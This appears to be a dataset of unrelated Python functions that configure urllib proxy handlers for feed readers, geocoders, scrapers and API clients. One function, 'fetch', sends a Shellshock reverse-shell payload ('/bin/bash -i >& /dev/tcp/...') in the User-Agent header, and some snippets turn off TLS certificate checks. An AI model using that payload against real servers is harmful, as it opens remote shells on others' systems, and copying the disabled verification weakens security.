def update_feed(self, feed): handlers = [] if utils.web.proxy(): handlers.append( ProxyHandler({'http': utils.force(utils.web.proxy())})) handlers.append( ProxyHandler({'https': utils.force(utils.web.proxy())})) with feed.lock: d = feedparser.parse(feed.url, etag=feed.etag, modified=feed.modified, handlers=handlers) if 'status' not in d or d.status != 304: # Not modified if 'etag' in d: feed.etag = d.etag if 'modified' in d: feed.modified = d.modified feed.data = d.feed feed.entries = d.entries feed.last_update = time.time() # feedparser will store soft errors in bozo_exception and set # the "bozo" bit to 1 on supported platforms: # https://pythonhosted.org/feedparser/bozo.html # If this error caused us to e.g. not get any entries at all, # it may be helpful to show it as well. if getattr(d, 'bozo', 0) and hasattr(d, 'bozo_exception'): feed.last_exception = d.bozo_exception else: feed.last_exception = None (initial, feed.initial) = (feed.initial, False) self.announce_feed(feed, initial)
def build_opener(self, debug=False): """Create handlers with the appropriate debug level. We intentionally create new ones because the OpenerDirector class in urllib2 is smart enough to replace its internal versions with ours if we pass them into the urllib2.build_opener method. This is much easier than trying to introspect into the OpenerDirector to find the existing handlers. Based on http://code.activestate.com/recipes/440574/#c1 TODO: Implement workaround for http://bugs.python.org/issue7152 """ http_handler = HTTPHandler(debuglevel=debug) https_handler = HTTPSHandler(debuglevel=debug) proxy_handler = ProxyHandler(debuglevel=debug) unknown_handler = UnknownHandler(debuglevel=debug) http_default_error_handler = HTTPDefaultErrorHandler(debuglevel=debug) http_redirect_handler = HTTPRedirectHandler(debuglevel=debug) http_error_processor = HTTPErrorProcessor(debuglevel=debug) handlers = [http_handler, https_handler, proxy_handler, \ unknown_handler, http_default_error_handler, \ http_redirect_handler, http_error_processor] opener = build_opener(handlers) return opener
def __init__(self, format_string=DEFAULT_FORMAT_STRING, scheme=DEFAULT_SCHEME, timeout=DEFAULT_TIMEOUT, proxies=None): """ Mostly-common geocoder validation, proxies, &c. Not all geocoders specify format_string and such. """ self.format_string = format_string self.scheme = scheme if self.scheme not in ('http', 'https'): # pragma: no cover raise ConfigurationError( 'Supported schemes are `http` and `https`.') self.proxies = proxies self.timeout = timeout # Add urllib proxy support using environment variables or # built in OS proxy details # See: http://docs.python.org/2/library/urllib2.html # And: http://stackoverflow.com/questions/1450132/proxy-with-urllib2 if self.proxies is None: self.urlopen = urllib_urlopen else: self.urlopen = build_opener(ProxyHandler(self.proxies))
def add_release(self, srr_file): """srr_file: the srr file to upload""" opener = register_openers() if _PROXY: opener.add_handler(ProxyHandler({_PROXY_TYPE: _PROXY_URL})) # Ensure file is Unicode: srr_file = srr_file.decode(sys.getfilesystemencoding()) datagen, new_headers = multipart_encode({ "MAX_FILE_SIZE": _MAX_FILE_SIZE, "file": open(srr_file, "rb"), "upload": "Upload", }) headers = dict(self.headers) # makes copy original dict headers.update(new_headers) url = self.baseurl + "upload" request = Request(url, datagen, headers) opener.add_handler(HTTPCookieProcessor(self.cj)) # Actually do the request, and get the response handle = urllib2.urlopen(request) html_source = handle.read() if len(re.findall(".* was uploaded\.", html_source)): print("'%s' was added." % srr_file) return True elif len(re.findall(".* is.*administrator.*", html_source)): print("!!! '%s' already exists." % srr_file) elif len(re.findall(".*contains illegal characters.*", html_source)): print("!!! '%s' contains illegal characters." % srr_file) else: print(html_source) return False
def check_proxy(self, specific={}): """ Checks if proxy settings are set on the OS Returns: -- 1 when direct connection works fine -- 2 when direct connection fails and any proxy is set in the OS -- 3 and settings when direct connection fails but a proxy is set see: https://docs.python.org/2/library/urllib.html#urllib.getproxies """ os_proxies = getproxies() if len(os_proxies) == 0 and self.check_internet_connection: logging.info("No proxy needed nor set. Direct connection works.") return 1 elif len(os_proxies) == 0 and not self.check_internet_connection: logging.error("Proxy not set in the OS. Needs to be specified") return 2 else: # env['http_proxy'] = os_proxies.get("http") env['https_proxy'] = os_proxies.get("https") # proxy = ProxyHandler({ 'http': os_proxies.get("http"), 'https': os_proxies.get("https") }) opener = build_opener(proxy) install_opener(opener) urlopen('http://www.google.com') return 3, os_proxies
def getLinks(pageUrl, recursionLevel): global pages if recursionLevel > 4: return pageId = insertPageIfNotExists(pageUrl) url = "http://en.wikipedia.org" + pageUrl proxy_handler = ProxyHandler({'http': '114.113.126.86:80'}) opener = build_opener(proxy_handler) install_opener(opener) user_agent = 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0' values = { 'name': 'Michael Foord', 'location': 'Northampton', 'language': 'Python' } headers = {'User-Agent': user_agent} data = urllib.urlencode(values) request = Request(url, data, headers) html = urlopen(request) bsObj = BeautifulSoup(html) for link in bsObj.findAll("a", href=re.compile("^(/wiki/)((?!:).)*$")): insertLink(pageId, insertPageIfNotExists(link.attrs['href'])) if link.attrs['href'] not in pages: newPage = link.attrs['href'] pages.add(newPage) getLinks(newPage, recursionLevel + 1)
def fetchLayerInfo(cls, url, ver=None, proxy=None): '''Non-GDAL static method for fetching LDS layer ID's using etree parser.''' res = [] content = None wfs_ns = cls.NS['wfs20'] if re.match('^2', ver) else cls.NS['wfs11'] ftxp = "//{0}FeatureType".format(wfs_ns) nmxp = "./{0}Name".format(wfs_ns) ttxp = "./{0}Title".format(wfs_ns) kyxp = "./{0}Keywords/{0}Keyword".format(cls.NS['ows']) try: if not LDSUtilities.assessNone(proxy): install_opener(build_opener(ProxyHandler(proxy))) #content = urlopen(url)#bug in lxml doesnt close url/files using parse method with closing(urlopen(url)) as content: tree = etree.parse(content) for ft in tree.findall(ftxp): name = ft.find(nmxp).text #.encode('utf8') title = ft.find(ttxp).text #.encode('utf8') #keys = [x.text.encode('utf8') for x in ft.findall(kyxp)] keys = [x.text for x in ft.findall(kyxp)] res += ((name, title, keys), ) except XMLSyntaxError as xe: ldslog.error('Error parsing URL;' + str(url) + ' ERR;' + str(xe)) return res
def download(self, url, user_agent, proxy, num_retries, data=None): print('Downloading:', url) headers = {'User_agent': user_agent} request = Request(url, headers=headers) opener = self.opener or build_opener() if proxy: proxy_params = {urlparse(url).scheme: proxy} opener.add_handler(ProxyHandler(proxy_params)) try: response = opener.open(request) html = response.read() code = response.code except Exception as e: print('Download error:', str(e)) html = None if hasattr(e, 'code'): code = e.code if num_retries > 0 and 500 <= code < 600: return self.download(self, url, user_agent, proxy, num_retries - 1) else: code = None return {'html': html, 'code': code}
def get(self, url): """ Internal API for GET request on a OTX URL :param url: URL to retrieve :return: response in JSON object form """ if self.proxy: proxy = ProxyHandler({'http': self.proxy}) request = build_opener(proxy) else: request = build_opener() request.addheaders = [('X-OTX-API-KEY', self.key), ('User-Agent', self.sdk)] response = None try: response = request.open(url) except URLError as e: if isinstance(e, HTTPError): if e.code == 403: raise InvalidAPIKey("Invalid API Key") elif e.code == 400: raise BadRequest("Bad Request") else: raise e data = response.read().decode('utf-8') json_data = json.loads(data) return json_data
def build_opener(source_address=None, timeout=10): """Function similar to ``urllib2.build_opener`` that will build an ``OpenerDirector`` with the explicit handlers we want, ``source_address`` for binding, ``timeout`` and our custom `User-Agent` """ # printer('Timeout set to %d' % timeout, debug=True) if source_address: source_address_tuple = (source_address, 0) # printer('Binding to source address: %r' % (source_address_tuple,), debug=True) else: source_address_tuple = None handlers = [ ProxyHandler(), SpeedtestHTTPHandler(source_address=source_address_tuple, timeout=timeout), SpeedtestHTTPSHandler(source_address=source_address_tuple, timeout=timeout), HTTPDefaultErrorHandler(), HTTPRedirectHandler(), HTTPErrorProcessor() ] opener = OpenerDirector() opener.addheaders = [('User-agent', build_user_agent())] for handler in handlers: opener.add_handler(handler) return opener
def __init__(self, source_registry, time_update_at, delay, registry_delay, services_not_available, source_registry_proxy=None): super(Registry, self).__init__(services_not_available) self.start_time = get_now() self.INFINITY_LOOP = True self.DATA_PATH = DATA_PATH self.registry_xml = os.path.join(self.DATA_PATH, 'registry.xml') self.source_registry = source_registry self.source_registry_proxy = source_registry_proxy if type(time_update_at).__name__ == 'str': self.time_update_at = string_time_to_datetime(time_update_at or '05:30:00') else: self.time_update_at = time_update_at self.delay = delay self.registry_delay = registry_delay if source_registry_proxy: proxy = ProxyHandler({ 'http': source_registry_proxy, 'https': source_registry_proxy }) self.urlopen = build_opener(proxy).open else: self.urlopen = urlopen
def fetch(url, ip, port, timeout=3, verbos=False, method='get', debugLevel=0, proxy=False, tor=False): payload = "() { ignored;};/bin/bash -i >& /dev/tcp/%s/%s 0>&1" % (ip, port) try: proxy_support = ProxyHandler({'http': proxy} if proxy else {}) opener = build_opener(proxy_support, HTTPHandler(debuglevel=debugLevel)) opener = build_opener( # HTTPHandler(debuglevel=level), SocksiPyHandler(PROXY_TYPE_SOCKS5, '127.0.0.1', 9050), ) if tor else opener # exit(opener.open('http://ifconfig.me/ip').read().strip()) # Spoof the user-agent opener.addheaders = [('User-agent', payload)] install_opener(opener) # url = 'http://%s' % url if not url.startswith('http://') else url opener.open(url, timeout=timeout) # src = src.read() # return src except socket.timeout: if verbos: print "[!] Connection lost to host: %s" % url exit(1)
def run_query(query_string, output='json', update=False): # use null ProxyHandler to ignore proxy for localhost access proxy_support = ProxyHandler({}) opener = build_opener(proxy_support) install_opener(opener) pre = prefixes.Prefixes() if update: action = 'update' qstr = urlencode([(action, "%s %s" % (pre.sparql, query_string))]) else: action = 'query' qstr = urlencode([(action, "%s %s" % (pre.sparql, query_string)), ("output", output), ("stylesheet", "/static/xml-to-html-links.xsl")]) BASEURL = "http://127.0.0.1:3131/metocean/%s?" % action data = '' try: data = opener.open(Request(BASEURL), qstr).read() except URLError: raise Exception("Unable to contact Fuseki server on %s" % BASEURL) if output == "json": return process_data(data) elif output == "text": return data else: return data
def install_proxy(self): """set proxy if one is set in QGIS network settings""" # initially support HTTP for now if self.settings.value('/proxy/proxyEnabled') == 'true': if self.settings.value('/proxy/proxyType') == 'HttpProxy': ptype = 'http' else: return user = self.settings.value('/proxy/proxyUser') password = self.settings.value('/proxy/proxyPassword') host = self.settings.value('/proxy/proxyHost') port = self.settings.value('/proxy/proxyPort') proxy_up = '' proxy_port = '' if all([user != '', password != '']): proxy_up = '%s:%s@' % (user, password) if port != '': proxy_port = ':%s' % port conn = '%s://%s%s%s' % (ptype, proxy_up, host, proxy_port) install_opener(build_opener(ProxyHandler({ptype: conn})))
def __init__(self, language='english', user_agent=USER_AGENT, proxy=None): self.set_language(language) self.user_agent = user_agent if proxy is not None: proxy_support = ProxyHandler({'http': proxy, 'https': proxy}) opener = build_opener(proxy_support) install_opener(opener)
def readLDS(up, q): '''Simple LDS reader to be used in a timed worker thread context''' (u, p) = up ldslog.debug("LDS URL {} using Proxy {}".format(u, p)) if LDSUtilities.isProxyValid(p): install_opener(build_opener(ProxyHandler(p))) with closing(urlopen(u)) as lds: q.put(lds.read())
def http_request(url, method="GET"): proxy_handler = ProxyHandler({}) opener = build_opener(proxy_handler) try: req = opener.open(url, timeout=30) return req except Exception as e: #logging.exception("web_control http_request:%s fail:%s", url, e) return False
def __fetchResolutionFromJira__(self): global JIRA_URL bug = "%s-%d" % (self._bugType, self._number) if bug in self._fetchResults_: result = self._fetchResults_[bug] self._resolution = result[0] self._fix = result[1] return data = None proxy = os.getenv("SYSTEST_PROXY", None) try: if proxy: proxy = ProxyHandler({'https': proxy}) opener = build_opener(proxy) install_opener(opener) bugReport = urlopen('%s/%s' % (JIRA_URL, bug)) data = bugReport.read() except: data = self.__tryExternalTools__(proxy) if data == None: test.warning( "Sorry, ssl module missing - cannot fetch data via HTTPS", "Try to install the ssl module by yourself, or set the python " "path inside SQUISHDIR/etc/paths.ini to use a python version with " "ssl support OR install wget or curl to get rid of this warning!" ) if data == None: test.fatal("No resolution info for %s" % bug) self._resolution = 'Done' else: if isinstance(data, (bytes)): data = str(data) data = data.replace("\r", "").replace("\n", "") resPattern = re.compile( '<span\s+id="resolution-val".*?>(?P<resolution>.*?)</span>' ) resolution = resPattern.search(data) fixVersion = 'None' fixPattern = re.compile( '<span.*?id="fixfor-val".*?>(?P<fix>.*?)</span>') fix = fixPattern.search(data) titlePattern = re.compile('title="(?P<title>.*?)"') if fix: fix = titlePattern.search(fix.group('fix').strip()) if fix: fixVersion = fix.group('title').strip() self._fix = fixVersion if resolution: self._resolution = resolution.group("resolution").strip() else: test.fatal( "FATAL: Cannot get resolution of bugreport %s" % bug, "Looks like JIRA has changed.... Please verify!") self._resolution = None if self._resolution == None: self.__cropAndLog__(data) self._fetchResults_.update({bug: [self._resolution, self._fix]})
def get_opener(handlers=[], headers={}, proxies={}): """Get HTTP URL opener and call its `open()` method to open an URL. Arguments: - `handlers`: list, handlers support cookie, authority, and other advanced HTTP features. - `headers`: dictionary, be treated as if add_header() was called with each key and value as arguments, often used to "spoof" the `User-Agent` header or `Referer` header, etc. - `proxies`: dictionary, URL of the proxy, e.g. {'http': 'http://<host>:<port>'}, if your proxy requires authentication: {'http': 'http://<user>:<password>@<host>:<port>'} """ _handlers = [] _handlers.extend(handlers) # proxy handler http_proxy = proxies or \ settings.get('allow_proxy') and settings.get('proxies', None) if http_proxy: try: _handlers.append(ProxyHandler(http_proxy)) except Exception as e: print("\n==> Waring: proxy invalid, please check.") print(e) # gzip/deflate/bzip2 compression handler if settings.get('accept_gzip'): encoding_handler = utils.ContentEncodingProcessor() _handlers.append(encoding_handler) # redirect handler _handlers.append(utils.HTTPRedirectHandler) opener = build_opener(*_handlers) # Add HTTP Request Headers # default HTTP Headers in configures _headers = settings.get('default_headers') # dictionary of HTTP Headers to attach _headers.update(headers) # remove if we have a value in default headers if _headers: normal_keys = [k.capitalize() for k in _headers] for key, val in opener.addheaders[:]: # default key, value: 'User-agent', 'Python-urllib/2.7' # see python doc if key not in normal_keys: # list search continue opener.addheaders.remove((key, val)) # Extend `addheaders` of the opener, dict to tuple list opener.addheaders.extend(_headers.items()) return opener
def u2handlers(self): handlers = [] handlers.append(ProxyHandler(self.proxy)) handlers.append(HTTPBasicAuthHandler(self.pm)) # python ssl Context support - PEP 0466 if hasattr(ssl, '_create_unverified_context'): ssl_context = ssl._create_unverified_context() handlers.append(HTTPSHandler(context=ssl_context)) else: handlers.append(HTTPSHandler()) return handlers
def update_feed(self, feed): handlers = [] if utils.web.proxy(): handlers.append(ProxyHandler( {'http': utils.force(utils.web.proxy())})) handlers.append(ProxyHandler( {'https': utils.force(utils.web.proxy())})) with feed.lock: d = feedparser.parse(feed.url, etag=feed.etag, modified=feed.modified, handlers=handlers) if 'status' not in d or d.status != 304: # Not modified if 'etag' in d: feed.etag = d.etag if 'modified' in d: feed.modified = d.modified feed.data = d.feed feed.entries = d.entries feed.last_update = time.time() (initial, feed.initial) = (feed.initial, False) self.announce_feed(feed, initial)
def __init__(self, format_string=None, proxies=None): self.format_string = format_string or '%s' self.proxies = proxies # Add urllib proxy support using environment variables or # built in OS proxy details # See: http://docs.python.org/2/library/urllib2.html # And: http://stackoverflow.com/questions/1450132/proxy-with-urllib2 if self.proxies is None: self.urlopen = urllib_urlopen else: self.urlopen = build_opener(ProxyHandler(self.proxies))
def get_full_data(): try: if "https_proxy" in environ: proxy = ProxyHandler({"https": environ.get("https_proxy")}) opener = build_opener(proxy) install_opener(opener) datajson = urlopen(req).read() return loads(datajson) except Exception as e: print '[' + str(datetime.now()) + '] - ' + str(e) return 0
def Checkout_ip(ip): socket.setdefaulttimeout(1) proxy_handler = ProxyHandler({'http': proxy}) opener = build_opener(proxy_handler) install_opener(opener) try: html = urlopen('http://baidu.com') if html: tag = True except Exception: tag = False ip = None return tag, ip
def sendRequest(text, lang='en-ru'): ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE proxy = ProxyHandler({'https': '199.201.121.139:3128'}) try: opener = build_opener(proxy) opener.add_handler(HTTPSHandler(context=ctx)) req = Request(url_request.format(text=text.encode('utf-8'), lang=lang)) req.get_method = lambda: 'POST' response = json.loads(opener.open(req).read().decode('utf-8')) except: response = '' return response
def parse(self, url, proxy=None): # FIXME: useless for the concurrent processing if proxy: proxy_handler = ProxyHandler({'http': proxy}) g.opener = build_opener(proxy_handler) result = {} try: video_id = REGEX_YOUTUBE_VIDEO_ID.search(url) video = pafy.new( self.decorate(video_id.group("video_id"))) except IOError, exc: raise ValueError(unicode(exc))
def __init__(self, server, port, username, password, verbose=False): self.server = server self.port = port self.username = username self.password = password self.base_url = 'https://%s:%s' % (self.server, self.port) self.verbose = verbose self.launched_scans = {} # Force urllib2 to not use a proxy hand = ProxyHandler({}) opener = build_opener(hand) install_opener(opener) self.login()
def ValifyProxy(protocol='http',ip='',port=0): from urllib2 import OpenerDirector,Request,ProxyHandler,URLError,HTTPError,BaseHandler import urllib2 import fakerhelper proxyheader = ProxyHandler({protocol:"%s:%s" % (ip ,port)}) proxyopener = urllib2.build_opener(proxyheader) baseheader = BaseHandler() headers = fakerhelper.GetFakerHeader() baseheader.add_parent(headers) try: testresponse = proxyopener.open("http://www.baidu.com",timeout = 10) except: print "wrong proxy ip",ip else: print "correct proxy ip",ip,":",port with open(proxiesfile,'ab') as f: f.write("%s::%s\n" % (ip , port))
def main(): """Start application """ formatter = logging.Formatter( "%(asctime)s [%(name)s:%(levelname)s] %(message)s") loghandle = logging.StreamHandler() loghandle.setFormatter(formatter) logger.addHandler(loghandle) args = get_args() if args.debug: logger.setLevel(logging.DEBUG) else: logger.setLevel(logging.INFO) if os.name != 'nt': if 'http_proxy' not in os.environ or 'https_proxy' not in os.environ: logger.warning("Note: http_proxy and/or https_proxy " "environment variables not set") logger.info("Python v{maj}: {exe}".format(maj=PYMAJ, exe=sys.executable)) proxy = ProxyHandler() install_opener(build_opener(proxy)) _check_urls() archive, url = DJANGO[args.django] if not args.offline: try: download(url, archive) except (URLError, HTTPError, TypeError) as err: logger.error("Error downloading Django {name}: {error}".format( name=args.django, error=err.reason)) sys.exit(1) myconnpy_install = os.path.join(os.getcwd(), 'test_install') _install_connector(myconnpy_install) django_tests( args.django, archive, myconnpy=myconnpy_install, tests=args.tests, group=args.group, )
def get(self, save_to_file_path=None): """ Getting browscap file contents and saving it to file or returning it as a string. Returns file contents if save_to_file_path is not None, file contents as string otherwise. ;param save_to_file_path: path on filesystem where browscap file will be saved :type save_to_file_path: string :returns: None or browscap file contents :rtype: string :raises: ValueError, urllib2.URLError, urllib2.HTTPError """ try: log.info('Downloading latest version of browscap file from %s', self.url) opener = build_opener() if self.proxy is not None: log.info('Setting up proxy server %s' % self.proxy) opener.add_handler(ProxyHandler({'http': self.proxy})) if self.additional_handlers is not None: for handler in self.additional_handlers: opener.add_handler(handler) opener.addheaders = [('User-agent', 'pybrowscap downloader')] install_opener(opener) response = opener.open(self.url, timeout=self.timeout) contents = response.read() response.close() except ValueError: log.exception('Url to browscap file is probably invalid') raise except URLError: log.exception('Something went wrong while processing urllib2 handlers') raise except HTTPError: log.exception('Something went wrong while downloading browscap file') raise if save_to_file_path is not None: try: log.info('Saving latest version of browscap file to %s', save_to_file_path) with open(save_to_file_path, 'wb') as file: file.write(contents) except IOError: log.exception('Error while saving latest version of browscap file') raise else: return contents